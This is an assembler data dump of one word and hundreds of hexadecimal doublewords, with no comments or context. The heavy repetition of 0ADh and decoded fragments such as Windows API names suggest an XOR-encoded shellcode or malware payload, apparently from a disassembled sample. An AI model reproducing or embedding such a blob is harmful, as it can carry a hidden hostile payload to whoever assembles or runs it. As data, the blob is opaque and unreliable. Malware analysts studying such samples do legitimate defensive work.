dw 453Dh
dd 0ADADADADh, 5A89A926h, 0AD89862Dh, 0ADADADADh, 135242Dh
dd 26ADAD84h, 0D9A989F1h, 24F45180h, 0AD841D1Dh, 191524ADh
dd 2DADAD84h, 0AD898215h, 0A0D845ADh, 899D35AEh, 0F626ADADh
dd 469E52AFh, 9C3526A5h, 52ADAD89h, 38F8F69Eh, 0A989C12Ch
dd 0ADADDDC5h, 5DAD4E2Ch, 402C5252h, 0ADEDBDABh, 0A989D126h
dd 99911820h, 0AD14ADEDh, 5EADADADh, 0E3D62C09h, 0DEC4C5F9h
dd 0EE26A0D8h, 0B5A92091h, 0FD952CCBh, 2CA5D9E8h, 0ADACAD46h
dd 264FD8ADh, 7EAED5FDh, 268DDF26h, 5EAEB5E7h, 6EAE00FCh
dd 0AD52D52Ch, 0D8D9C8EAh, 0AED52CB6h, 0CEC2DFFDh, 0D52CBFD8h
dd 0C9C9ECAAh, 2CA4D8DFh, 0DEC8A6D5h, 0A8D9ADDEh, 0F0F47A4Fh
dd 89A1846Eh, 0F489DF26h, 1AA25EAEh, 0D726E3A9h, 2656AEB1h
dd 5EAE2A99h, 0ADADA145h, 0C2C1EEADh, 0CCE5C8DEh, 0C8C1C9C3h
dd 7B52FEADh, 98912824h, 0A045ADEDh, 0EEADADADh, 0D9CCC8DFh
dd 0C8DBE8C8h, 0ADECD9C3h, 247B52FEh, 0ED98ED28h, 0ADA045ADh
dd 0C8EAADADh, 0DECCE1D9h, 0DFDFE8D9h, 0FEADDFC2h, 28247B52h
dd 0ADED98E9h, 0ADADDD45h, 0D96D28ADh, 3852FD8Ch, 0ADED98E9h
dd 0BDD86D28h, 0BC7F2820h, 0FD27ADEDh, 0ADC34552h, 0D146ADADh
dd 98913852h, 285AADEDh, 0ADED999Ch, 2DADADADh, 1820B3D9h
dd 0ADED9998h, 0A989D126h, 30260809h, 0ADED941Fh, 941B1826h
dd 1026ADEDh, 0ADED9417h, 0C7F76EF0h, 0C7ADC7ADh, 0C5ADC7ADh
dd 0ADA9ADACh, 0ADC76926h, 26A1C7FDh, 0FB4F5269h, 0AD9EF2F9h
dd 45649EADh, 52525277h, 0BC0C3820h, 0FCFFADEDh, 3852FDFCh
dd 0ADED98EDh, 6E8D692Eh, 0F2145F27h, 9DADAD8Fh, 7BAFEDBDh
dd 0A6E544Fh, 24D84689h, 163C47AEh, 3995AFD7h, 78E78FD6h
dd 0A1880632h, 34297C1Eh, 0DA301BD6h, 0FC95558Fh, 0AFFD0C0Ah
dd 86DC27B7h, 16481AC0h, 1FC46D64h, 3F7D3259h, 0C74CD707h
dd 0C162C6Ch, 6DF4CC65h, 0B9AD2ACBh, 0D8FC479Bh, 79555087h
dd 10ED7C96h, 21BD8BC7h, 2D7206DEh, 0A9F018FCh, 99C10059h
dd 503803DFh, 0F19338A6h, 0D9608B06h, 0D7D0283Dh, 696BF05Ah
dd 0ED0C47FEh, 7CC0BECBh, 0E31C9F66h, 0DBD863E3h, 0DD29386Eh
dd 7C00EBC7h, 0AC600096h, 0B6B76CC4h, 952CC213h, 863BDB22h
dd 0CD1ECB7Fh, 511582AAh, 0B85CA71Eh, 0D932C807h, 8221DC76h
dd 0E1843038h, 0ADA6EB35h, 84093B31h, 0AD2E6273h, 0FA33D04Ah
dd 0C52B0ED2h, 0EEDC2C4Ch, 1CA4CC7Eh, 0B19DACFAh, 0C6EC776Bh
dd 0E9F5BBE6h, 7376FB89h, 7B2F3C95h, 9D1DCDCEh, 0D9E00F52h
dd 3C44EF5Eh, 0D1BD8C9Ah, 0E08C974Bh, 4C94B402h, 0C70BE058h
dd 3130B30Ah, 0FF3C43EEh, 7568EA72h, 8D65E581h, 0A0C812D2h
dd 5539081Eh, 81301BD7h, 4D953F4Ch, 0E42816D5h, 0B03467CEh
dd 0F0A0CB12h, 2FB51A2h, 0A2B13330h, 0DA46FD34h, 0C9E5C717h
dd 0AE453466h, 0C4681E49h, 5AFC07EEh, 0C6BEDCB6h, 9D22A769h
dd 35C6D37Ah, 0C520FB9Ah, 9C788E5Dh, 0B8D9FF46h, 91785499h
dd 0C811EE7Dh, 0D920BE02h, 55576407h, 1A8F15Ch, 0D0F4EA7Dh
dd 46903B02h, 0D28A9CA2h, 655DE875h, 0EABC875Bh, 7C8FAA82h
dd 5DA43CC3h, 14A016B1h, 0F5D377DEh, 8B355463h, 4614FFF5h
dd 11CDDB2Fh, 342C180Eh, 0AAC9CE1Dh, 0F00F2F36h, 0C1288606h
dd 0D4331E5Dh, 0FFD57403h, 5341FD5h, 8E67DEB8h, 0E3323AA3h
dd 764B6BF2h, 0C452CF7Ch, 620C2305h, 58634BFh, 43276221h
dd 0CC1586h, 51AD5CDFh, 0F5001ECEh, 8D6B0B52h, 0C309EBBBh
dd 0E7D78C65h, 28885AD5h, 0C910BBC2h, 0EA79B4C0h, 0D56A480Eh
dd 77972142h, 11804189h, 0DD64E618h, 0A1A2DF31h, 5C63395h
dd 0E9305B8Ah, 1CD4554Eh, 8176E978h, 803CF271h, 9AF8CB52h
dd 336CEF32h, 0CAE83333h, 0AE4CFDEAh, 0E390114Eh, 3FB6B566h
dd 3F70A3A0h, 3FFC07C7h, 0C62ABA32h, 79B1B0C6h, 3E88934Fh
dd 0CA933287h, 560D3C26h, 0DE172F9h, 283803FAh, 759C2D3Ah
dd 7C936459h, 0ADC48237h, 8425F35Ah, 0E54C43B2h, 0DC1DDBBDh
dd 2D3487C6h, 2D4D9CD8h, 0FDBC875Bh, 0F900ABE4h, 368B601Ah
dd 5318E34Fh, 0E94501F7h, 3FD5BC07h, 0A861D3A7h, 0AEA803EBh
dd 7569AF9Bh, 0D5A5C292h, 2D846F43h, 0AB48D98Eh, 4959E841h
dd 8C50BB37h, 0D2410026h, 279A49DCh, 0BFA80C78h, 0A82839B3h
dd 4EA4CF16h, 836D179Fh, 37BC502Bh, 4519ED4Bh, 8DB118E3h
dd 5D2D3C3Ch, 7E1CE7FBh, 0FB65D96h, 0C213B966h, 0C11DA30Fh
dd 7548547Eh, 0F5854495h, 0C7F45F93h, 0CE5A890Ah, 0D509377Bh
dd 78A89272h, 0F6F38FD6h, 85C49A5Bh, 9053A04Ah, 0E9706E4Eh
dd 0E817C975h, 0D138B516h, 4A8B338Eh, 59957B87h, 89C42AF6h
dd 0BF6B7506h, 0DAA2E53Ah, 0E3D85FF6h, 929EB566h, 0B12D0B5Fh
dd 213C82AEh, 4A878EEh, 0AE244F92h, 516B42B3h, 0F35032E7h
dd 81851BE2h, 0FA3E87h, 0C56843EAh, 25CD711Eh, 4C9FD882h
dd 0BD845ADEh, 75F1339Fh, 0C178A8F1h, 7515B44Ah, 0C574DF10h
dd 4E279E26h, 2929383Dh, 1200EBC7h, 75208ECEh, 7648933Bh
dd 0B010E261h, 8C59DB22h, 40EB403Dh, 9A003E3h, 1C92E756h
dd 94454B92h, 7D852F76h, 0C168B3DAh, 0A5CC17BEh, 5F01FB02h
dd 0A5A1A0B5h, 0DA98637Fh, 15F82B77h, 572290C7h, 7CE693D5h
dd 80463689h, 0A885233h, 4A15F140h, 0DA880CF2h, 47E7F159h
dd 8068D5A7h, 2D936752h, 53218344h, 0E45A309Ah, 23E9A31Fh
dd 8875D7ABh, 0C8865CA6h, 773D976Bh, 0D8592B87h, 10F05B13h
dd 0DD25E8B8h, 0C0AD61F9h, 77FC926Ah, 9A55388Dh, 0E947E35h
dd 0A519E658h, 0D8B935EBh, 4DC5BF7Dh, 9C61DD9Eh, 33AB333Eh
dd 4038F65Bh, 0ECA213D6h, 2EB4BB07h, 8579C6B8h, 3A9353CBh
dd 5525835Eh, 0CE167CE6h, 12F8B214h, 0C518D8B6h, 0DD9963E7h
dd 68269752h, 0D738278Bh, 21F94B27h, 8D05E6BBh, 0CEBD3CD9h
dd 55C5966Eh, 0E5693A97h, 0FE45E05h, 6C11F34Fh, 0D8AA17FEh
dd 70C8B20Ch, 0BE00EA81h, 34A27B33h, 481BF656h, 0C22C12E4h
dd 0F6AF07h, 0A440DAAAh, 16F866C7h, 5A11936Bh, 0FC4C3EF6h
dd 19EA4E3Eh, 0C129D6B6h, 0F1B872F9h, 4F209667h, 0A351338Fh
dd 30FD4E2Bh, 0A119C02Eh, 0C9AD0EE6h, 75D0AE46h, 844F53BBh
dd 3789612Ah, 471FF251h, 0F9B13886h, 62CAA63Ch, 0B072C8A7h
dd 15E04A2Ah, 71208E59h, 0E05A11F3h, 65CDAE0Ch, 9F60DA8Fh
dd 0E2837ACFh, 5D31A56Ch, 0E573478Bh, 10C64517h, 0BC29EABAh
dd 0CFA163CAh, 4AACB679h, 0B95E3E92h, 28F75034h, 8178F059h
dd 0D0BF08FCh, 2B93B861h, 8E76C6B0h, 33B8332Eh, 5629F451h
dd 0C7E248F1h, 6DC0A703h, 0B76CC699h, 14996BC7h, 50329F46h
dd 0F8503AF4h, 32889209h, 0AC2AC3BBh, 0C0A47ECEh, 5E549A6Bh
dd 0E15D2686h, 6E5744Eh, 8D0DEEA6h, 0E9A102DFh, 6DC1B575h
dd 8865039Bh, 27C53B27h, 7B04FE4Bh, 0FEAF06E3h, 79D58108h
dd 9056AB97h, 3C917B24h, 4D24D256h, 0D22C14F1h, 0CC4B210h
dd 0A878D680h, 108C4DAAh, 46298D6Ah, 0F0521BE6h, 18E84600h
dd 951BD6BDh, 0CBA97CD1h, 4A24B502h, 99553A94h, 1DF1652Fh
dd 0A132874Bh, 0D8A519F1h, 6FF4AA62h, 926D3095h, 31A2372Dh
dd 4815E961h, 0FF841AF2h, 62DDA005h, 0F564E2BDh, 2BA37F1Ch
dd 58308E53h, 0F54B16C9h, 65E2B817h, 0A85DCF8Ch, 0C89D49D6h
dd 623EAC7Dh, 0FC48248Bh, 3780451Dh, 0B814C0A2h, 0CDA155D4h
dd 71E2F77Bh, 87552BADh, 2EFB4D16h, 850BF04Fh, 0DBB90CE1h
dd 49D48512h, 9870C084h
dd 28BE4739h, 4439E34Ch, 0E4B536EEh, 6DCDAD09h, 834FD784h
dd 39973C7h, 4C34995Bh, 0F86923F7h, 18FABC17h, 0A918E5DEh
dd 0CA9975F7h, 5E319B69h, 0FF51319Eh, 34F37329h, 8A09F8BCh
dd 0D3AD1DC2h, 52FFF37Dh, 847804BFh, 39E54F30h, 4218FC26h
dd 0DEAB06F9h, 61D9AC0Dh, 976FC8F2h, 29876A38h, 552DF43Ah
dd 0F15F18F6h, 8DEA200h, 0BF14DAABh, 518E60CFh, 5132827Dh
dd 0FA4F3892h, 7DF04A1Dh, 0A41CDD93h, 0D1A979CCh, 7A3F9741h
dd 83551783h, 71FD4F2Eh, 0B008E967h, 0CDA505C0h, 5ED0AA51h
dd 84663D95h, 2189433Dh, 5D11EF71h, 0E39D7FE3h, 7FCAA61Eh
dd 8553D3ABh, 59A16537h, 5830817Fh, 0F54D1DE8h, 0BE9A731h
dd 887CC997h, 0D99A56A6h, 5436916Fh, 0F459159Ah, 15E96D16h
dd 99258FB3h, 0E89852ECh, 4182C52Dh, 0BB3017AEh, 21D75823h
dd 9A1DF045h, 0E7DC1EEBh, 69EFAC77h, 984FC193h, 907623h
dd 4229C53Eh, 0FBB50ED3h, 1D5891Fh, 895DC6BFh, 30AE07EFh
dd 4D25B855h, 0E8482EC0h, 20F0961Fh, 0C08534DEh, 0C1A1D389h
dd 0E554FF06h, 921C0F67h, 70F62724h, 0B333DB83h, 0ED08E4B3h
dd 55F82791h, 0B75D1794h, 0B905C411h, 0AE74DF13h, 24276F4Eh
dd 15FCF29Ah, 3A086F71h, 0EC618201h, 1248D32Fh, 85462761h
dd 0FC4FD508h, 0CD548A62h, 0D5F7C32Fh, 355CE79Eh, 0F0EE23C2h
dd 0A90F2F76h, 0DE3B3B0h, 0A5A457D4h, 6350EB02h, 0ED5E0DE4h
dd 71F1ED22h, 847CED2Eh, 2C3F3BE1h, 1DE4FAF2h, 74F70AA5h
dd 45AC0262h, 750464A7h, 985CF20Dh, 1D5BC32Ah, 0E51C3243h
dd 88E30B12h, 0EFBBBC61h, 0B4FCF611h, 0EA01D73Eh, 0C9109856h
dd 520B4B4Eh, 0D9DD68F5h, 183C07DBh, 79A3CAFDh, 222767D6h
dd 2443EC45h, 5ECC2C6h, 0CAD8D46Fh, 7F7C3F46h, 5A877CD5h
dd 0F5E9BB0Bh, 6D604E12h, 88B22FDh, 0A9E83379h, 0DAB36823h
dd 4A8FBC09h, 6DB43733h, 7045A3CAh, 15E61343h, 0B489D832h
dd 0DD39E113h, 30DC827Ah, 943DE78Fh, 9C9C8E5Dh, 9D3FF46h
dd 0ADADBCCEh, 289C677Bh, 8C608F10h, 0BDC46F5Eh, 0EC29AE1Ah
dd 0E54C4DBDh, 0DC1DC428h, 2D348528h, 911531DAh, 1596C74Ah
dd 9F0C6F71h, 47B08A91h, 185937Ah, 9F7AF259h, 6994DB22h
dd 0E49BFECh, 509202C0h, 46A3D4F1h, 1C35B496h, 15745BB6h
dd 0C168B3D1h, 0A697C735h, 0BCDDC752h, 0ED744594h, 709499C1h
dd 5FF7872Eh, 0B9C06ABAh, 0D68F3715h, 12C3D89Ah, 409856F8h
dd 0C2857965h, 8213FC44h, 426C483Dh, 0A14C6B45h, 0BB14B38h
dd 0A8BB105Ch, 8168466Ah, 0EE8013FDh, 8925CF57h, 2E2334A6h
dd 369FE4E0h, 95D44784h, 0BA837CFBh, 353C95BCh, 0A1C813B3h
dd 0AFCDB593h, 1945921Ch, 0B015685h, 0D478C31Ch, 0F7D46F0Ah
dd 2FE65E9Bh, 1FF3AFB6h, 41006699h, 784C973Eh, 92D99603h
dd 0F03FDF26h, 0F1589580h, 5DD87B2Dh, 80C4E432h, 1C244F96h
dd 618ADB96h, 0C104E3DEh, 56F01BA3h, 4D616F93h, 1CC4C8EAh
dd 749803CAh, 0B3308BD2h, 0BDC087B6h, 53FEF31Ah, 1A5B57AAh
dd 9A5B7D7h, 0A0BDAC26h, 0B1D9671Dh, 7FED966Eh, 0F86AFAF0h
dd 5DE40F3Eh, 0B4B7C17Ah, 856C42C2h, 1D465EF4h, 0A540EF9Dh
dd 51F802AEh, 11E81859h, 992049B2h, 4BACBA89h, 4431B39Ah
dd 46DA637Eh, 0DDDBAB16h, 0BC665F8Ch, 0E467751Dh, 0D53CB2E2h
dd 0CC00EEEBh, 885B99C6h, 0E14866C6h, 17A860D3h, 7134F175h
dd 8CD0E80Bh, 2213C36Ah, 0AC0CCD0Eh, 9B0A0A1h, 6D14BF66h
dd 14D721CAh, 65CCE21Ah, 0CB187F43h, 0D90B1FA6h, 0A4A7EB2Eh
dd 957C71F6h, 6115D421h, 8064CFE0h, 21C81778h, 4D9FD20h
dd 6DBDD0A4h, 0AE947F53h, 0D1ED0E33h, 0B6DC279Eh, 0CB5F9DC3h
dd 750B6F72h, 41E83245h, 245C1331h, 0B7507B82h, 2BA4AA5Ch
dd 0FE189D4Ah, 55FD062Ah, 197E6B32h, 1C62BEE3h, 2FC18344h
dd 4E2EC299h, 0A8B6DD6Dh, 5C9AD449h, 0C7694380h, 6509D81Dh
dd 8060CBE4h, 38CBAE8Dh, 1A8F3C5h, 0F8AED273h, 49FA3B02h
dd 2D74934Eh, 4E8B338Ah, 558AD7FBh, 0F90C96F2h, 0D8EB0F56h
dd 21489385h, 852CC677h, 398E5A62h, 0C242F694h, 51F8A62Fh
dd 3D9A640Eh, 962D773Eh, 7D84B6F2h, 0B4488FDAh, 9FF0BB4Dh
dd 9DC7E0Dh, 0E0995FE6h, 51B8036Ah, 0B01BA613h, 15BF1EC6h
dd 61D1EF2Ah, 0C1F72D7Bh, 30984336h, 2A0E1A53h, 0A2FB45F6h
dd 567EAB1Fh, 0C413A731h, 59C71BE8h, 6FA61836h, 0B494E665h
dd 0A5BFD73Eh, 9940EB92h, 0ADF4164Eh, 4637A70Ah, 0F4532B80h
dd 0EC7F2B16h, 0DD24B9F6h, 97BCD33Fh, 80253E2Dh, 0E9706DA8h
dd 4F945717h, 8029032Ah, 202337D8h, 19E0FD36h, 0E6073A7Bh
dd 72B8331Ah, 751DC3F7h, 76812AD0h, 2D81B3F3h, 0D51C24CAh
dd 60C09251h, 0FAB8EB72h, 8853C216h, 9889D33Ah, 8323E41Dh
dd 0FBB14CF6h, 6419A343h, 0E2573189h, 29E84121h, 0BD0EE285h
dd 0E1B718D9h, 73DA8659h, 0B378399Bh, 20E34927h, 6828F149h
dd 0DEB413F2h, 15CEA21Ch, 9E72CAA6h, 32AC7B33h, 2348E749h
dd 85DC889Eh, 19B0DB62h, 0A46CD0B4h, 23912DC7h, 593D806Dh
dd 0B75933F3h, 33844306h, 0E123F093h, 0D6AE63CDh, 7A398A69h
dd 0A8670AECh, 41FC0318h, 0E549B71Ch, 99EE4B83h, 309EEF38h
dd 0AF411CB0h, 2C9A117Eh, 2305EF50h, 8DD497D3h, 90E5C36Ah
dd 0B5011323h, 2E65CD52h, 3D44AF23h, 0B4BCE665h, 8D4DD73Eh
dd 0A32CCFDDh, 0FD4194B8h, 6858A33Fh, 0E0127B42h, 47014D58h
dd 0FE119229h, 9788AE37h, 7327F75Eh, 8F950CE0h, 2711B2E3h
dd 5E78C319h, 0F5EFF70Bh, 5F293112h, 34A230Ch, 0A3E982A1h
dd 0A80F7CF1h, 0C9C5CA07h, 6DDE8F66h, 64E7ADA0h, 55BC320Ah
dd 316497B1h, 750F3A92h, 6188D37Eh, 0C52FF18Dh, 9C788E5Dh
dd 45BCFF46h, 79C7BC16h, 759C2749h, 8623CD81h, 42C43CF9h
dd 419D7B8Fh, 193DBFFEh, 1F78C4BDh, 0D28B60D5h, 0F1CB6007h
dd 15B72F6Eh, 0AA55ABF2h, 6FD75D13h, 6D04D714h, 19B9889Eh
dd 81B09B57h, 0CD14BFCCh, 238870DDh, 53288967h, 66704BD3h
dd 3DB167E3h, 95ED3ADAh, 0AACC578Bh, 0E9DD7633h, 64341FFEh
dd 31AE65CFh, 4083D62Eh, 0B9805E2Eh, 1DA0A785h, 548553FAh
dd 45AC2FB3h, 5CD167Bh, 65D43FB0h, 0EE4735BCh, 929960A8h
dd 0A6E04B4Fh, 54E16CC6h, 81283387h, 78AB42F3h, 9D40BB82h
dd 0AD9E1ECCh, 315A8B58h, 0C3C7EEh, 79C01D42h, 0A83E4F53h
dd 0FB459E98h, 57ACB703h, 5CBD5D88h, 4DD42221h, 8128D57Eh
dd 202335DFh, 19E0FD26h, 0D19150AEh, 87E8736Ch, 6574DABBh
dd 85387B82h, 3AB4DF66h, 0BA5BEC99h, 11D2359Dh, 0C640A77Eh
dd 0DD11D303h, 66E0407Ah, 486CB7DEh, 0E9E85F17h, 0B0D9A606h
dd 91787616h, 8A6A76A6h, 0D96C632Dh, 0F4936FB6h, 44E6BA54h
dd 0A94879AAh, 0DC6F3B0Eh, 2D34AABAh, 35D7A30Fh, 15BCC689h
dd 0F905C361h, 0E8690F56h, 21088BB8h, 9D91FAC7h, 81B09B54h
dd 32EB49DCh, 67E4BE29h, 3A5CE74Eh, 99218916h, 0ED68AE76h
dd 9568B3DBh, 0A5CD16D6h, 0F5C50402h, 6C341FD3h, 7199B38Eh
dd 1F7D72Eh, 46926BD8h, 5D92D383h, 0B8C8D6FAh, 0CD843A2Bh
dd 0D6709B31h, 0CDE1C313h, 925A286Ah, 0B501CE73h, 70950B52h
dd 20296ABBh, 7E7873DAh, 25BADFEBh, 0C6D03EC2h, 0ADF52422h
dd 3D18680Ah, 0A5C34765h, 64E9AEFDh, 58A28F96h, 0A1882BF7h
dd 6FAC9D1Fh, 163231E3h, 0DA22BD3h, 2E80002Ah, 0B4CEE381h
dd 9433CB12h, 0BD19CA63h
dd 13F8595Ah, 21D9686Dh, 0CD03BB4h, 9F31D0A6h, 7C18A3CAh
dd 15E18113h, 0D1485A32h, 62DBB52Ah, 61884712h, 2347E9DEh
dd 0FDD42F2Bh, 38CC6AF9h, 2CB543AAh, 75DC3ADAh, 44888A63h
dd 363B904Ch, 0C0B8D75Eh, 0A1075F1Eh, 0A9513F66h, 930942Eh
dd 0B4303382h, 30BCC76Eh, 0F9789DDCh, 971F001h, 0A248D30Fh
dd 0C2EA7B5Ah, 0FC3DFB64h, 0CD54A247h, 709003C0h, 675CE70Eh
dd 89B5B4C1h, 0F0846F40h, 967C97A6h, 90948241h, 0D96FB42h
dd 877455DEh, 22CF734Ah, 0E36C12D1h, 5FC36BF2h, 6729Bh
dd 0E16253BAh, 45EC3B36h, 0D623CC22h, 0CDE26F13h, 11B4FE6Ah
dd 0B869A7CEh, 6FAEBEDFh, 0B0C9EF76h, 81684BD7h, 65E61955h
dd 3643ED93h, 0EDC21333h, 31A0600Ah, 1EAD6890h, 3735A68Ch
dd 6D64CFE0h, 0D466E1B7h, 0FD44970Eh, 88CFA418h, 44772834h
dd 3A79F4A7h, 9E13EC64h, 571D46DCh, 0E04EFC0h, 0AA1FB4FEh
dd 0B0B3C487h, 89904D82h, 78C362E6h, 8519A38Ah, 20CC6F84h
dd 0ACBFEB32h, 9D647A2Ah, 59C56EFAh, 0B16CB79Eh, 0C075DCB3h
dd 0D54BF1Bh, 573843EAh, 35A46ACBh, 8F898BD2h, 7A3B9048h
dd 41BD739Fh, 0E50C57FEh, 4D5266C2h, 627E9226h, 0DEB70DAAh
dd 73D3E700h, 9F69C7D2h, 12C42E33h, 4C21E71Ah, 0EA5857FBh
dd 5D5B842h, 0AC66DDA3h, 5CD966DEh, 157CC704h, 0B96F6BB2h
dd 10E95A05h, 0A648C1BFh, 0C0A865DFh, 35DDA6Ch, 88583AB4h
dd 14F45724h, 0AC10F45Dh, 0C9A10392h, 7C84B666h, 84283794h
dd 26894726h, 5D1EFA56h, 0F9A75FAAh, 78DCAD0Bh, 0D526C0A0h
dd 0EEA067Fh, 55279B57h, 0A14F1DF3h, 45E0BB1Fh, 0E969DAA6h
dd 8D9071C7h, 593F8A64h, 0F31C6B9Ah, 1FA0591Dh, 0B301E6A4h
dd 0E8E860DEh, 6CCD803Eh, 0E33D6196h, 3FF15711h, 0A319A34Fh
dd 0DAA547EBh, 7F80E767h, 9361C684h, 61D7403Eh, 4021F87Dh
dd 0FD995BA3h, 4DC7B646h, 9475CABEh, 21B5278Fh, 55609815h
dd 0BC413BF7h, 75A1D977h, 9C3BA778h, 0D01D2109h, 0F7B1B0D2h
dd 153C645Bh, 0D8DB1789h, 153CE94Bh, 7CBAADDAh, 53E0E969h
dd 44A417C9h, 5D8377E0h, 0D41E8F80h, 28A03E4h, 15BC1FD6h
dd 0F900ABF2h, 5DE40F56h, 2148933Ah, 852C779Eh, 69B0DB62h
dd 0CD14BFC6h, 51F803AAh, 355CE70Eh, 99204B92h, 7D842F76h
dd 0C168B3DAh, 0A5CC17BEh, 950FB02h, 0ED345FE6h, 7198234Ah
dd 0D57C872Eh, 0B9C06BB2h, 1DA4CF16h, 626853FAh, 5D591FBh
dd 8CF39B22h, 8D94462Ch, 520FCC6Ah, 0ED4F2ADAh, 5FABBC5Dh
dd 79CF3F35h, 0C30357BEh, 5E95A572h, 0DD63B380h, 86E05D2Dh
dd 0A4D1EF48h, 957C7E48h, 402AAEFBh, 0D88F8F96h, 43E0D139h
dd 16E96C7h, 1EB5D3E2h, 0A5947F64h, 0D178834Eh, 0B5DC47E6h
dd 3D254612h, 0A404EFD4h, 4D9C2B63h, 0C74857BDh, 7558475h
dd 0AEB49F5Fh, 7C1B7A3Dh, 55BC2559h, 49BFFBD1h, 1E24C06Ah
dd 976AD792h, 0E7482A57h, 93731BE2h, 26518B06h, 814A40D8h
dd 2D6069C3h, 0E3E3D589h, 42C01BB6h, 0FEAB1828h, 0B2E4478Ch
dd 626FC4BDh, 87F9B4E8h, 0E9D823B3h, 0D6888C6Dh, 0C0922E7Dh
dd 0D8230F16h, 2108AAB4h, 852C779Eh, 69B0E78Ah, 439134C6h
dd 0B9F84393h, 0CAA3107Bh, 9920537Ah, 0F339AC76h, 0C168F3E3h
dd 38451FCBh, 910D9A2h, 60CBC30Dh, 71D81AC4h, 47F908EDh
dd 30C02B8Bh, 5D9D4183h, 0E10BBBFAh, 8CDF375Eh, 0A9E310E1h
dd 0DFD47F86h, 0EE462E82h, 5F89A431h, 5AE04B6Bh, 313E6CE0h
dd 86AC7C9Ah, 0E68CD77Fh, 0C610ABB8h, 0ADF4E222h, 3D1A680Ah
dd 6BF4AFBEh, 0FC83D48Dh, 0DD24B67Ch, 2B98D5B9h, 5557716h
dd 10B04296h, 0D974B68h, 99F372C1h, 6A3DE68Fh, 987F14CDh
dd 0B148EB0Fh, 1804465Ah, 0DCCF5F15h, 3E5F7478h, 0BB4DF66h
dd 0C2E6DB4Bh, 0FE79089Ch, 6F40EB32h, 0E8247515h, 71C2587Fh
dd 0CFE7B535h, 41A1EAA1h, 0F2AB0174h, 0A892F6E9h, 0F031270Eh
dd 0D69BF312h, 0BDC4EB32h, 0AB1D0C1Ah, 0B50C17C7h, 0B66E6EAAh
dd 87F19CD9h, 3ED823B3h, 55856DEBh, 0DD04A8F2h, 5F248C05h
dd 97474809h, 53E9496h, 0A8E3FBABh, 0E4109BE2h, 5DD127B6h
dd 0DE1CBC2Ah, 96DBCA7Bh, 95994A1h, 699332E4h, 0D11779FBh
dd 50AB7A34h, 99CBFEDDh, 0A763A264h, 0A1D0320Ch, 2A3BEA94h
dd 695797FFh, 9CF3D2E4h, 311F6FB7h, 6F8B1A34h, 0F9355AB9h
dd 21434264h, 81FD82F1h, 0CB75F454h, 6644AF0Fh, 7ED70273h
dd 0A70F8981h, 37FF52D6h, 0AE37E059h, 0D900E760h, 6AC3B1FBh
dd 5D51BEFAh, 65028F96h, 43CA0B8Bh, 7AF13DEh, 839B3D00h
dd 0B77C6740h, 52877CDFh, 645B6F4Ch, 0F1F8CE78h, 2FB5A1Bh
dd 32EBC9DAh, 271C2735h, 0C9F4AA07h, 4A5F7566h, 5B40CBA0h
dd 20FFFD2Eh, 0D1515B2Ah, 62DBBA5Bh, 6188D2C2h, 0B1BE33DEh
dd 5710CAAFh, 0E6A214CCh, 9138FBEFh, 9737A74Eh, 64ED486Dh
dd 0BD845B8Ah, 359976EDh, 0E50C57BEh, 4AE4BB42h, 0DADEFF96h
dd 0F1EC520Fh, 15BCC46Eh, 0F84A4F3h, 0E5E40F56h, 0C9A4186Fh
dd 38A5DC35h, 69F0E2F4h, 66BE5776h, 65C9865Dh, 355CE74Eh
dd 24A94A92h, 7DC416ECh, 449FF8AEh, 0A58C238Fh, 0B50FB02h
dd 1250385Eh, 0C99D567Ch, 0FBF7E349h, 0B9780D19h, 690FA916h
dd 4B55E3F9h, 71DDB2A9h, 29709B62h, 6C7786h, 64B8CB07h
dd 0C49950D8h, 59E04B66h, 8540EF36h, 8120B619h, 0E634D20Ah
dd 6210432Fh, 9C71E8E9h, 3258A33Eh, 0E13C47EEh, 0D3699B76h
dd 4BE1047Dh, 2AC85383h, 8C64DCD1h, 6CC7A7AAh, 4DD40B77h
dd 0D1788329h, 0D26438FAh, 90963476h, 0BD3D314Bh, 4150985Ah
dd 8E28F03Eh, 89F6F23Ah, 0D05C7466h, 41E75C34h, 0A933EF8Eh
dd 0A314CDh, 88DBF7F0h, 0CA19781Ch, 0F15D2255h, 7B071BE2h
dd 0D573DF1h, 854D43EAh, 8A62B0A6h, 317F3B2Dh, 423B931Fh
dd 14574B7Ch, 4E9DFC98h, 0CC1BF4C9h, 2D34A6B8h, 0F951ABA1h
dd 24393092h, 0FD00EBC6h, 29E40F56h, 0E1612B28h, 3D87BF60h
dd 6DC41B6Ah, 3561076Dh, 0A6536441h, 7568D68Bh, 99204392h
dd 0FDCE5A76h, 815C9C67h, 0E4B817BEh, 2048D2BAh, 0C691552Fh
dd 0B198637Eh, 707684CAh, 0B9805F99h, 0B7157FBDh, 0D527D670h
dd 0F546371Eh, 2F59162h, 27D43FB2h, 0EC5A7B0Ch, 0C12D2239h
dd 59F00B12h, 3A30EF36h, 0E7823A2Ah, 370A2C6h, 63F80B69h
dd 245FDF95h, 716161B7h, 0A4B9B0EEh, 59806B46h, 0A8648FD6h
dd 0AB90A3B3h, 4598DE9Bh, 5156F1E2h, 0C863FFC7h, 0D138B71Bh
dd 0B5DC67CEh, 0DD20C866h, 0D4A1A5DEh, 27E8736Eh, 0A3F11E95h
dd 22D03BBBh, 59855A91h, 0F118A38Ah, 5C8947AEh, 0BC42BB82h
dd 9D647BBFh, 500D24D0h, 456CF7EAh, 0DCF01BA2h, 7EC4F0Dh
dd 0D10C696Fh, 48778D4Eh, 0C15133B4h, 89F5EA41h, 0A8F35Ah
dd 0E77857FEh, 0EC9A12F2h, 2D34AB0Ch, 0BBDB874Ah, 5588EDCBh
dd 9FABCDF2h, 0AA148EEEh, 617CA2BFh, 852E779Eh, 0DDB2AE62h
dd 0E7B1B50Eh, 37F8439Eh, 97E16EA5h, 21200BABh, 7D840B4Ah
dd 0F0ED4471h, 0ADCC578Ah, 7D50FB02h, 0DCB1A88Ah, 7198637Eh
dd 0A07C872Ah, 0B378DBB9h, 5D90E493h, 0ACE3F9FAh, 71DDB2A9h
dd 21709B62h, 9CA17F86h, 0F13B7B0Ch, 0C13702C4h, 0F2860B12h
dd 0D6EE2F05h, 0A890158Fh, 4E29DD66h, 910FBF6h, 8FE1C42h
dd 3118D721h, 10CBEC88h, 79C01F43h, 0DD649FD6h, 6149ABDCh
dd 0C12CF46Ah, 0C29551EAh, 2B947F72h, 54CE8C81h, 0B59C53A1h
dd 28253CB9h, 0FD04EFC2h
dd 35A8335Ah, 271C2737h, 0C9E45207h, 0E8437566h, 0F15897FBh
dd 55FC27AEh, 3B356D82h, 0D2A94B92h, 482D5984h, 4C6CF7EAh
dd 0E9C9912Fh, 8DFF9906h, 964D4616h, 3A1C27FEh, 2ECACB2Dh
